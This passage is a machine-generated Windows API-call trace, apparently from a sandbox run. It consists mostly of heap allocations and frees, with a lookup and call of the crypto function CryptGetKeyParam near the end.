RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0182.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0182.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0182.106] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0182.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0182.106] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0182.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0182.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0182.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0182.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0182.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0182.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0182.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0182.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0182.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0182.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0182.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0182.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0182.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.111] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0182.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0182.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0182.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0182.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0182.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0182.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0182.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0182.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0182.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0182.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0182.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0182.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0182.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0182.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0182.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0182.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0182.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0182.112] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0182.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0182.112] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0182.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd558 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0182.112] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0182.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0182.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0182.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0182.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0182.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0182.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0182.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0182.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0182.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0182.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0182.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0182.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0182.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0182.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0182.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0182.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0182.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0182.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0182.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0182.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0182.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0182.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0182.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0182.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0182.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0182.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0182.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0182.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0182.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0182.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0182.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0182.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0182.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0182.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0182.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0182.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0182.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0182.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0182.116] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0182.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0182.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0182.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0182.117] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0182.117] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c27a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0182.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 